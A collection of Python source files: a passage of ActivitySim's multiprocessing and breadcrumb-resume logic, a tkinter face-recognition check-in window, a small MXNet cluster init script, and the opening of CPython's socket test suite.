# info(f'{p.name}.exitcode = {p.exitcode}')
mem.trace_memory_info(f"run_model {p.name} completed")
if p.exitcode:
error(f"Process {p.name} returned exitcode {p.exitcode}")
raise RuntimeError("Process %s returned exitcode %s" % (p.name, p.exitcode))
def drop_breadcrumb(step_name, crumb, value=True):
"""
Add (crumb: value) to specified step in breadcrumbs and flush breadcrumbs to file
run can be resumed with resume_after
Breadcrumbs provides a record of steps that have been run for use when resuming
Basically, we want to know which steps have been run, which phases completed
(i.e. apportion, simulate, coalesce). For multi-processed simulate steps, we also
want to know which sub-processes completed successfully, because if resume_after
is LAST_CHECKPOINT we don't have to rerun the successful ones.
Parameters
----------
step_name : str
crumb : str
value : yaml-writable value
Returns
-------
"""
breadcrumbs = inject.get_injectable('breadcrumbs', OrderedDict())
breadcrumbs.setdefault(step_name, {'name': step_name})[crumb] = value
inject.add_injectable('breadcrumbs', breadcrumbs)
write_breadcrumbs(breadcrumbs)
def run_multiprocess(injectables):
"""
run the steps in run_list, possibly resuming after checkpoint specified by resume_after
we never open the pipeline since that is all done within multi-processing steps -
mp_apportion_pipeline, run_sub_simulations, mp_coalesce_pipelines -
each of which opens the pipeline/s and closes it/them within the sub-process
This 'feature' makes the pipeline state a bit opaque to us, for better or worse...
Steps may be either single or multi process.
For multi-process steps, we need to apportion pipelines before running sub processes
and coalesce them afterwards
injectables arg allows propagation of setting values that were overridden on the command line
(parent process command line arguments are not available to sub-processes in Windows)
* allocate shared data buffers for skims and shadow_pricing
* load shared skim data from OMX files
* run each (single or multiprocess) step in turn
Drop breadcrumbs along the way to facilitate resuming in a later run
Parameters
----------
run_list : dict
annotated run_list (including prior run breadcrumbs if resuming)
injectables : dict
dict of values to inject in sub-processes
"""
mem.trace_memory_info("run_multiprocess.start")
run_list = get_run_list()
if not run_list['multiprocess']:
raise RuntimeError("run_multiprocess called but multiprocess flag is %s" %
run_list['multiprocess'])
old_breadcrumbs = run_list.get('breadcrumbs', {})
# raise error if any sub-process fails without waiting for others to complete
fail_fast = setting('fail_fast')
info(f"run_multiprocess fail_fast: {fail_fast}")
def skip_phase(phase):
skip = old_breadcrumbs and old_breadcrumbs.get(step_name, {}).get(phase, False)
if skip:
info(f"Skipping {step_name} {phase}")
return skip
def find_breadcrumb(crumb, default=None):
return old_breadcrumbs.get(step_name, {}).get(crumb, default)
# - allocate shared data
shared_data_buffers = {}
mem.trace_memory_info("allocate_shared_skim_buffer.before")
t0 = tracing.print_elapsed_time()
shared_data_buffers.update(allocate_shared_skim_buffers())
t0 = tracing.print_elapsed_time('allocate shared skim buffer', t0)
mem.trace_memory_info("allocate_shared_skim_buffer.completed")
# combine shared_skim_buffer and shared_shadow_pricing_buffer in shared_data_buffer
t0 = tracing.print_elapsed_time()
shared_data_buffers.update(allocate_shared_shadow_pricing_buffers())
t0 = tracing.print_elapsed_time('allocate shared shadow_pricing buffer', t0)
mem.trace_memory_info("allocate_shared_shadow_pricing_buffers.completed")
# - mp_setup_skims
if len(shared_data_buffers) > 0:
run_sub_task(
multiprocessing.Process(
target=mp_setup_skims, name='mp_setup_skims', args=(injectables,),
kwargs=shared_data_buffers)
)
t0 = tracing.print_elapsed_time('setup shared_data_buffers', t0)
mem.trace_memory_info("mp_setup_skims.completed")
# - for each step in run list
for step_info in run_list['multiprocess_steps']:
step_name = step_info['name']
num_processes = step_info['num_processes']
slice_info = step_info.get('slice', None)
if num_processes == 1:
sub_proc_names = [step_name]
else:
sub_proc_names = ["%s_%s" % (step_name, i) for i in range(num_processes)]
# - mp_apportion_pipeline
if not skip_phase('apportion') and num_processes > 1:
run_sub_task(
multiprocessing.Process(
target=mp_apportion_pipeline, name='%s_apportion' % step_name,
args=(injectables, sub_proc_names, step_info))
)
drop_breadcrumb(step_name, 'apportion')
# - run_sub_simulations
if not skip_phase('simulate'):
resume_after = step_info.get('resume_after', None)
previously_completed = find_breadcrumb('completed', default=[])
completed = run_sub_simulations(injectables,
shared_data_buffers,
step_info,
sub_proc_names,
resume_after, previously_completed, fail_fast)
if len(completed) != num_processes:
raise RuntimeError("%s processes failed in step %s" %
(num_processes - len(completed), step_name))
drop_breadcrumb(step_name, 'simulate')
# - mp_coalesce_pipelines
if not skip_phase('coalesce') and num_processes > 1:
run_sub_task(
multiprocessing.Process(
target=mp_coalesce_pipelines, name='%s_coalesce' % step_name,
args=(injectables, sub_proc_names, slice_info))
)
drop_breadcrumb(step_name, 'coalesce')
# add checkpoint with final tables even if not intermediate checkpointing
if not pipeline.intermediate_checkpoint():
pipeline.open_pipeline('_')
pipeline.add_checkpoint(pipeline.FINAL_CHECKPOINT_NAME)
pipeline.close_pipeline()
mem.log_global_hwm() # main process
def get_breadcrumbs(run_list):
"""
Read, validate, and annotate breadcrumb file from previous run
if resume_after specifies a model name, we need to determine which step it falls within,
drop any subsequent steps, and set the 'simulate' and 'coalesce' to None so
Extract from breadcrumbs file showing completed mp_households step with 2 processes:
::
- apportion: true
completed: [mp_households_0, mp_households_1]
name: mp_households
simulate: true
coalesce: true
Parameters
----------
run_list : dict
validated and annotated run_list from settings
Returns
-------
breadcrumbs : dict
validated and annotated breadcrumbs file from previous run
"""
resume_after = run_list['resume_after']
assert resume_after is not None
# - read breadcrumbs file from previous run
breadcrumbs = read_breadcrumbs()
# - can't resume multiprocess without breadcrumbs file
if not breadcrumbs:
error(f"empty breadcrumbs for resume_after '{resume_after}'")
raise RuntimeError("empty breadcrumbs for resume_after '%s'" % resume_after)
# if resume_after is specified by name
if resume_after != LAST_CHECKPOINT:
# breadcrumbs for steps from previous run
previous_steps = list(breadcrumbs.keys())
# find the run_list step resume_after is in
resume_step = next((step for step in run_list['multiprocess_steps']
if resume_after in step['models']), None)
resume_step_name = resume_step['name']
if resume_step_name not in previous_steps:
error(f"resume_after model '{resume_after}' not in breadcrumbs")
raise RuntimeError("resume_after model '%s' not in breadcrumbs" % resume_after)
# drop any previous_breadcrumbs steps after resume_step
for step in previous_steps[previous_steps.index(resume_step_name) + 1:]:
del breadcrumbs[step]
# if resume_after is not the last model in the step
# then we need to rerun the simulations in that step, even if they succeeded
if resume_after in resume_step['models'][:-1]:
if 'simulate' in breadcrumbs[resume_step_name]:
breadcrumbs[resume_step_name]['simulate'] = None
if 'coalesce' in breadcrumbs[resume_step_name]:
breadcrumbs[resume_step_name]['coalesce'] = None
multiprocess_step_names = [step['name'] for step in run_list['multiprocess_steps']]
if list(breadcrumbs.keys()) != multiprocess_step_names[:len(breadcrumbs)]:
raise RuntimeError("last run steps don't match run list: %s" %
list(breadcrumbs.keys()))
return breadcrumbs
def get_run_list():
"""
validate and annotate run_list from settings
Assign defaults to missing settings (e.g. chunk_size)
Build individual step model lists based on step starts
If resuming, read breadcrumbs file for info on previous run execution status
# annotated run_list with two steps, the second with 2 processors
::
resume_after: None
multiprocess: True
models:
- initialize_landuse
- compute_accessibility
- initialize_households
- school_location
- workplace_location
multiprocess_steps:
step: mp_initialize
begin: initialize_landuse
name: mp_initialize
models:
- initialize_landuse
- compute_accessibility
- initialize_households
num_processes: 1
chunk_size: 0
step_num: 0
step: mp_households
begin: school_location
slice: {'tables': ['households', 'persons']}
name: mp_households
models:
- school_location
- workplace_location
num_processes: 2
chunk_size: 10000
step_num: 1
Returns
-------
run_list : dict
validated and annotated run_list
"""
models = setting('models', [])
multiprocess_steps = setting('multiprocess_steps', [])
resume_after = inject.get_injectable('resume_after', None) or setting('resume_after', None)
multiprocess = inject.get_injectable('multiprocess', False) or setting('multiprocess', False)
# default settings that can be overridden by settings in individual steps
global_chunk_size = setting('chunk_size', 0) or 0
default_mp_processes = setting('num_processes', 0) or int(1 + multiprocessing.cpu_count() / 2.0)
if multiprocess and multiprocessing.cpu_count() == 1:
warning("Can't multiprocess because there is only 1 cpu")
run_list = {
'models': models,
'resume_after': resume_after,
'multiprocess': multiprocess,
# 'multiprocess_steps': multiprocess_steps # add this later if multiprocess
}
if not models or not isinstance(models, list):
raise RuntimeError('No models list in settings file')
if resume_after == models[-1]:
raise RuntimeError("resume_after '%s' is last model in models list" % resume_after)
if multiprocess:
if not multiprocess_steps:
raise RuntimeError("multiprocess setting is %s but no multiprocess_steps setting" %
multiprocess)
# check step name, num_processes, chunk_size and presence of slice info
num_steps = len(multiprocess_steps)
step_names = set()
for istep in range(num_steps):
step = multiprocess_steps[istep]
step['step_num'] = istep
# - validate step name
name = step.get('name', None)
if not name:
raise RuntimeError("missing name for step %s"
" in multiprocess_steps" % istep)
if name in step_names:
raise RuntimeError("duplicate step name %s"
" in multiprocess_steps" % name)
if name in models:
raise RuntimeError(f"multiprocess_steps step name '{name}' cannot also be a model name")
step_names.add(name)
# - validate num_processes and assign default
num_processes = step.get('num_processes', 0)
if not isinstance(num_processes, int) or num_processes < 0:
raise RuntimeError("bad value (%s) for num_processes for step %s"
" in multiprocess_steps" % (num_processes, name))
if 'slice' in step:
if num_processes == 0:
info(f"Setting num_processes = {num_processes} for step {name}")
num_processes = default_mp_processes
if num_processes > multiprocessing.cpu_count():
warning(f"num_processes setting ({num_processes}) "
f"greater than cpu count ({ multiprocessing.cpu_count()})")
else:
if num_processes == 0:
num_processes = 1
if num_processes > 1:
raise RuntimeError("num_processes > 1 but no slice info for step %s"
" in multiprocess_steps" % name)
multiprocess_steps[istep]['num_processes'] = num_processes
# - validate chunk_size and assign default
chunk_size = step.get('chunk_size', None)
if chunk_size is None:
if global_chunk_size > 0 and num_processes > 1:
chunk_size = int(round(global_chunk_size / num_processes))
chunk_size = max(chunk_size, 1)
else:
chunk_size = global_chunk_size
multiprocess_steps[istep]['chunk_size'] = chunk_size
# - determine index in models list of step starts
start_tag = 'begin'
starts = [0] * len(multiprocess_steps)
for istep in range(num_steps):
step = multiprocess_steps[istep]
name = step['name']
slice = step.get('slice', None)
if slice:
if 'tables' not in slice:
raise RuntimeError("missing tables list for step %s"
" in multiprocess_steps" % istep)
start = step.get(start_tag, None)
if not name:
raise RuntimeError("missing %s tag for step '%s' (%s)"
" in multiprocess_steps" %
(start_tag, name, istep))
if start not in models:
raise RuntimeError("%s tag '%s' for step '%s' (%s) not in models list" %
(start_tag, start, name, istep))
starts[istep] = models.index(start)
if istep == 0 and starts[istep] != 0:
raise RuntimeError("%s tag '%s' for first step '%s' (%s)"
" is not first model in models list" %
(start_tag, start, name, istep))
if istep > 0 and starts[istep] <= starts[istep - 1]:
raise RuntimeError("%s tag '%s' for step '%s' (%s)"
" falls before that of prior step in models list" %
(start_tag, start, name, istep))
# remember there should always be a final checkpoint with same name as multiprocess_step name
multiprocess_steps[istep]['last_checkpoint_in_previous_multiprocess_step'] = \
multiprocess_steps[istep - 1].get('name') if istep > 0 else None
# - build individual step model lists based on starts
starts.append(len(models)) # so last step gets remaining models in list
for istep in range(num_steps):
step_models = models[starts[istep]: starts[istep + 1]]
if step_models[-1][0] == LAST_CHECKPOINT:
raise RuntimeError("Final model '%s' in step %s models list not checkpointed" %
(step_models[-1], name))
multiprocess_steps[istep]['models'] = step_models
run_list['multiprocess_steps'] = multiprocess_steps
# - add resume breadcrumbs
if resume_after:
breadcrumbs = get_breadcrumbs(run_list)
if breadcrumbs:
run_list['breadcrumbs'] = breadcrumbs
# - add resume_after to last step
if resume_after is not None:
# get_breadcrumbs should have deleted breadcrumbs for any subsequent steps
istep = len(breadcrumbs) - 1
assert resume_after == LAST_CHECKPOINT or \
resume_after in multiprocess_steps[istep]['models']
multiprocess_steps[istep]['resume_after'] = resume_after
# - write run list to output dir
# use log_file_path so we use (optional) log subdir and prefix process name
with config.open_log_file('run_list.txt', 'w') as f:
print_run_list(run_list, f)
return run_list
def print_run_list(run_list, output_file=None):
"""
Print run_list to stdout or file (informational - not read back in)
Parameters
----------
run_list : dict
output_file : open file
"""
if output_file is None:
output_file = sys.stdout
print("resume_after:", run_list['resume_after'], file=output_file)
print("multiprocess:", run_list['multiprocess'], file=output_file)
print("models:", file=output_file)
for m in run_list['models']:
print(" - ", m, file=output_file)
# - print multiprocess_steps
if run_list['multiprocess']:
print("\nmultiprocess_steps:", file=output_file)
for step in run_list['multiprocess_steps']:
print(" step:", step['name'], file=output_file)
for k in step:
if isinstance(step[k], list):
print(" %s:" % k, file=output_file)
for v in step[k]:
print(" -", v, file=output_file)
else:
print(" %s: %s" % (k, step[k]), file=output_file)
# - print breadcrumbs
breadcrumbs = run_list.get('breadcrumbs')
if breadcrumbs:
print("\nbreadcrumbs:", file=output_file)
for step_name in breadcrumbs:
step = breadcrumbs[step_name]
print(" step:", step_name, file=output_file)
for k in step:
if isinstance(k, str):
print(" ", k, step[k], file=output_file)
else:
print(" ", k, file=output_file)
for v in step[k]:
print(" ", v, file=output_file)
def breadcrumbs_file_path():
# return path to breadcrumbs file in output_dir
return config.build_output_file_path('breadcrumbs.yaml')
def read_breadcrumbs():
"""
Read breadcrumbs file from previous run
write_breadcrumbs wrote OrderedDict steps as list so ordered is preserved
(step names are duplicated in steps)
Returns
-------
breadcrumbs : OrderedDict
"""
file_path = breadcrumbs_file_path()
if not os.path.exists(file_path):
raise IOError("Could not find saved breadcrumbs file '%s'" % file_path)
with open(file_path, 'r') as f:
breadcrumbs = yaml.load(f, Loader=yaml.SafeLoader)
# convert array to ordered dict keyed by step name
breadcrumbs = OrderedDict([(step['name'], step) for step in breadcrumbs])
return breadcrumbs
def write_breadcrumbs(breadcrumbs):
"""
Write breadcrumbs file with execution history of multiprocess run
Write steps as array so order is preserved (step names are duplicated in steps)
Extract from breadcrumbs file showing completed mp_households step with 2 processes:
::
- apportion: true
coalesce: true
completed: [mp_households_0, mp_households_1]
name: mp_households
simulate: true
Parameters
----------
breadcrumbs : OrderedDict
"""
with open(breadcrumbs_file_path(), 'w') as f:
# write ordered dict as array
breadcrumbs = [step for step in list(breadcrumbs.values())]
yaml.dump(breadcrumbs, f)
def if_sub_task(if_is, if_isnt):
"""
select one of two values depending whether current process is primary process or subtask
This is primarily intended for use in yaml files to select between (e.g.) logging levels
so main log file can display only warnings and errors from subtasks
In yaml file, it can be used like this:
level: !!python/object/apply:activitysim.core.mp_tasks.if_sub_task [WARNING, NOTSET]
Parameters
----------
if_is : (any type) value to return if process is a subtask
if_isnt : (any type) value to return if process is not a subtask
Returns
-------
(any type) (one of parameters if_is or if_isnt)
"""
return if_is if inject.get_injectable('is_sub_task', False) else if_isnt
|
w_recog.py
|
#
# Copyright (c) 2021 Takeshi Yamazaki
# This software is released under the MIT License, see LICENSE.
#
from collections import deque, Counter
import cv2
from decimal import Decimal, ROUND_HALF_UP
import numpy as np
import os
import PIL.Image, PIL.ImageTk
from playsound import playsound
import threading
import tkinter as tk
from tkinter import messagebox
from tkinter import ttk
from checklist import CheckList
from mycamera import MyCamera
from facecheck import FaceCheck
from w_base import BaseWindow
class RecogWindow(BaseWindow):
def __init__(self, master=None, auto_start=False):
super().__init__(master)
self._camera = MyCamera(width=self.settings.canvas.width, height=self.settings.canvas.height)
self.master.title("Recognition")
self._create_widgets()
files = sorted(os.listdir(self.settings.save_dir.onepic_dir_fullpath))
for f in files:
if os.path.isfile(os.path.join(self.settings.save_dir.onepic_dir_fullpath, f)):
dummy = cv2.imread(os.path.join(self.settings.save_dir.onepic_dir_fullpath, f))
break
else:
print('using camera picture for pre-recognition')
dummy = self._camera.read()
dummy = cv2.cvtColor(dummy, cv2.COLOR_BGR2RGB)
dummy = PIL.Image.fromarray(dummy)
self._fc = FaceCheck()
self._fc.setup_network(dummy_im=dummy, pre_recog=dummy)
self._cl = CheckList()
self._queue = deque([], 10)
self._identified_pause_fl = False
self._detecting = 0
if len(self._cl.get_checked_list()) > 0:
for item in self._cl.get_checked_list():
self._listbox_checked.insert(tk.END, item)
self._detecting = 2
self._switch_detection_state()
if self.settings.recognition.confirmation_sound != '':
self._sound_thread = threading.Thread(target=self._play_sound)
else:
self._sound_thread = None
self._camera.running = True
self._update()
if auto_start:
self.master.after(500, self._start_detection)
def _create_widgets(self):
padx = 30
pady = 20
ipadx = 30
ipady = 20
fontsize = self.settings.window.fontsize
s = ttk.Style()
s.configure('Inference.TLabel', font=("", 36, 'bold'), foreground='red')
s.configure('Failed.TLabel', font=("", 36, 'bold'), foreground='blue')
s.configure('Already.TLabel', font=("", 36, 'bold'), foreground='green')
# Canvas
self._canvas1 = tk.Canvas(self._frame_main, width=self.settings.canvas.width, height=self.settings.canvas.height)
self._canvas1.grid(column=0, row=0, sticky=tk.NSEW)
# Others
self._frame_others = ttk.Frame(self._frame_main)
self._frame_others.grid(column=2, row=0, sticky=tk.NSEW)
# Detection
self._frame_infer = ttk.Frame(self._frame_others)
self._frame_infer.grid(column=0, row=1, pady=pady, sticky=(tk.W, tk.E, tk.N, tk.S))
self._frame_infer_once = ttk.Frame(self._frame_infer)
self._frame_infer_once.grid(column=0, row=0, sticky=(tk.W, tk.E))
self._label_infer_pre = ttk.Label(self._frame_infer_once, text='You are :')
self._label_infer_pre.grid(column=0, row=0, sticky=tk.W)
self._frame_infer_answer = ttk.Frame(self._frame_infer_once)
self._frame_infer_answer.grid(column=0, row=1, sticky=(tk.W, tk.E))
self._label_infer = ttk.Label(self._frame_infer_answer, text='', style='Inference.TLabel')
self._label_infer.grid(column=0, row=0)
self._label_infer_prob = ttk.Label(self._frame_infer_answer, text='')
self._label_infer_prob.grid(column=0, row=1)
self._frame_infer_conf = ttk.Frame(self._frame_infer)
self._frame_infer_conf.grid(column=0, row=2, sticky=(tk.W, tk.E))
self._label_id = ttk.Label(self._frame_infer_conf, text='', style='Inference.TLabel')
self._label_id.grid(column=0, row=0)
self._label_id_name = ttk.Label(self._frame_infer_conf, text='', style='Inference.TLabel')
self._label_id_name.grid(column=0, row=1)
# Checked List
self._frame_checked = ttk.Frame(self._frame_others)
self._frame_checked.grid(column=1, row=1, padx=padx, sticky=(tk.W, tk.E, tk.N, tk.S))
self._frame_checked_inner = ttk.Frame(self._frame_checked)
self._frame_checked_inner.grid(column=0, row=0, sticky=tk.NSEW)
self._listbox_checked = tk.Listbox(self._frame_checked_inner, width=12, font=('', fontsize))
self._listbox_checked.grid(column=0, row=0, sticky=(tk.W, tk.E, tk.N, tk.S))
self._scrollbar_checked = ttk.Scrollbar(self._frame_checked_inner, orient=tk.VERTICAL, command=self._listbox_checked.yview)
self._listbox_checked['yscrollcommand'] = self._scrollbar_checked.set
self._scrollbar_checked.grid(column=1, row=0, sticky=(tk.N, tk.S))
self._button_delete = ttk.Button(self._frame_checked, text='Delete', command=self._delete_confirmation)
self._button_delete.grid(column=0, row=2, ipadx=ipadx, ipady=5, sticky=tk.EW)
# Button frame
self._frame_buttons = ttk.Frame(self._frame_others)
self._frame_buttons.grid(column=0, row=2, columnspan=2, sticky=tk.EW)
self._button_start = ttk.Button(self._frame_buttons, command=self._start_detection)
self._button_start.grid(column=0, row=0, padx=padx, pady=pady, ipadx=ipadx, ipady=ipady, sticky=tk.EW)
self._button_finish = ttk.Button(self._frame_buttons, text='Finish Check', command=self._finish_checking)
self._button_finish.grid(column=1, row=0, padx=padx, pady=pady, ipadx=ipadx, ipady=ipady, sticky=tk.EW)
self._frame_main.columnconfigure(1, minsize=30)
self._frame_main.columnconfigure(2, weight=1, minsize=400)
self._frame_main.rowconfigure(0, weight=1)
self._frame_others.columnconfigure(0, weight=1, minsize=250)
self._frame_others.rowconfigure(0, minsize=50)
self._frame_others.rowconfigure(1, weight=1)
self._frame_infer.columnconfigure(0, weight=1)
self._frame_infer.rowconfigure(0, weight=1)
self._frame_infer.rowconfigure(1, minsize=50)
self._frame_infer.rowconfigure(2, weight=1)
self._frame_infer_once.columnconfigure(0, weight=1)
self._frame_infer_conf.columnconfigure(0, weight=1)
self._frame_infer_answer.columnconfigure(0, weight=1)
self._frame_checked.columnconfigure(0, weight=1)
self._frame_checked.rowconfigure(0, weight=1)
self._frame_checked_inner.columnconfigure(0, weight=1)
self._frame_checked_inner.rowconfigure(0, weight=1)
self._frame_checked_inner.rowconfigure(1, minsize=20)
self._frame_buttons.columnconfigure(0, weight=1)
self._frame_buttons.columnconfigure(1, weight=1)
def _close(self):
self._camera.running = False
self._camera.cap.release()
self._sound_thread = None
self.master.destroy()
def _switch_detection_state(self):
# 0: not started 1: detecting 2: paused
if self._detecting == 0:
self._button_start.configure(text='Start')
self._button_finish.configure(state=tk.DISABLED)
self._label_infer.configure(text='')
self._label_infer_prob.configure(text='')
elif self._detecting == 1:
self._button_start.configure(text='Pause')
self._button_finish.configure(state=tk.NORMAL)
elif self._detecting == 2:
self._button_start.configure(text='Restart')
self._button_finish.configure(state=tk.NORMAL)
self._label_infer.configure(text='')
self._label_infer_prob.configure(text='')
def _start_detection(self):
if self._detecting == 0 or self._detecting == 2:
self._detecting = 1
elif self._detecting == 1:
self._detecting = 2
if self._identified_pause_fl == False:
self._label_id.configure(text='')
self._label_id_name.configure(text='')
self._switch_detection_state()
def _finish_checking(self):
self._detecting = 0
self._switch_detection_state()
self._label_id.configure(text='')
self._label_id_name.configure(text='')
file_path = self._cl.finish_checking()
tk.messagebox.showinfo('Finish Checking', 'Result Saved : {}'.format(file_path), parent=self.master)
self._listbox_checked.delete(0, tk.END)
def _delete_confirmation(self):
index = self._listbox_checked.curselection()
if len(index) == 0:
return
name = self._listbox_checked.get(index[0])
if isinstance(name, tuple):
name = name[0]
answer = tk.messagebox.askokcancel('Delete', 'Make sure you are deleting\n\n {}\n'.format(name), parent=self.master)
if answer:
self._listbox_checked.delete(index[0])
self._cl.delete_from_checked_list(index[0])
def _update(self):
frame = self._camera.value
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
image = PIL.Image.fromarray(frame)
if self._detecting == 1:
name, prob = self._fc.identify(frame, 0.6)
self._label_infer.configure(text=name)
percentage = Decimal(str(prob * 100)).quantize(Decimal('0'), rounding=ROUND_HALF_UP)
self._label_infer_prob.configure(text='( {} % )'.format(percentage))
if self._identified_pause_fl == False:
if self._cl.has_name(name) and not self._cl.already_checked(name):
self._queue.append(name)
self._label_id.configure(text='')
self._label_id_name.configure(text='')
if len(self._queue) == 10:
counter = Counter(self._queue)
mc = counter.most_common()[0]
if mc[1] >= 9 and mc[0] != '':
# identified
self._label_id.configure(text='Confirmed', style='Inference.TLabel')
self._label_id_name.configure(text=mc[0], style='Inference.TLabel')
self._cl.add_to_checked(mc[0])
self._listbox_checked.insert(tk.END, mc[0])
self._identified_pause_fl = True
if self._sound_thread != None:
self._sound_thread.start()
self.master.after(5000, self._reset_queue)
elif not self._cl.has_name(name):
if name == '':
self._queue.clear()
self._label_id.configure(text='')
self._label_id_name.configure(text='')
else:
self._label_id.configure(text='Not on', style='Failed.TLabel')
self._label_id_name.configure(text='the list', style='Failed.TLabel')
else:
self._label_id.configure(text='Already', style='Already.TLabel')
self._label_id_name.configure(text='confirmed', style='Already.TLabel')
self._photo = PIL.ImageTk.PhotoImage(image=image)
self._canvas1.create_image(self._canvas1.winfo_width() / 2, self._canvas1.winfo_height() / 2, image = self._photo, anchor=tk.CENTER)
self.master.after(self.settings.canvas.update_interval, self._update)
def _play_sound(self):
playsound(self.settings.recognition.confirmation_sound)
def _reset_queue(self):
if self._sound_thread != None:
self._sound_thread.join()
self._sound_thread = threading.Thread(target=self._play_sound)
self._identified_pause_fl = False
self._queue.clear()
self._label_id.configure(text='')
self._label_id_name.configure(text='')
if __name__ == "__main__":
window = tk.Tk()
app = RecogWindow(master=window)
app.mainloop()
|
init.py
|
import threading
import logging
import os
import os.path
import sys
import time
logging.basicConfig(level=logging.INFO, format='%(asctime)s.%(msecs)03d %(module)s %(levelname)s: %(message)s', datefmt="%Y-%m-%d %H:%M:%S")
def main():
logging.info("start init process ...")
logging.info("start training thread ...")
train = threading.Thread(target=(lambda: os.system("python /start.py")), args=())
train.setDaemon(True)
train.start()
logging.info("start speed monitor thread ...")
speed_monitor = threading.Thread(target=(lambda: os.system("python /speed-monitor.py")), args=())
speed_monitor.setDaemon(True)
speed_monitor.start()
logging.info("start progress monitor thread ...")
progress_monitor = threading.Thread(target=(lambda: os.system("python /progress-monitor.py")), args=())
progress_monitor.setDaemon(True)
progress_monitor.start()
while True:
time.sleep(60)
if __name__ == '__main__':
if len(sys.argv) != 1:
print "Description: MXNet init script in k8s cluster"
print "Usage: python init.py"
sys.exit(1)
main()
|
test_socket.py
|
import unittest
from test import support
from test.support import socket_helper
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = socket_helper.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_j1939():
"""Check whether CAN J1939 sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _have_socket_bluetooth():
"""Check whether AF_BLUETOOTH sockets are supported on this host."""
try:
# RFCOMM is supported by all platforms with bluetooth support. Windows
# does not support omitting the protocol.
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
except (AttributeError, OSError):
return False
else:
s.close()
return True
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_CAN_J1939 = _have_socket_can_j1939()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
HAVE_SOCKET_UDPLITE = hasattr(socket, "IPPROTO_UDPLITE")
HAVE_SOCKET_BLUETOOTH = _have_socket_bluetooth()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = socket_helper.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPLITETest(SocketUDPTest):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
self.port = socket_helper.bind_port(self.serv)
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
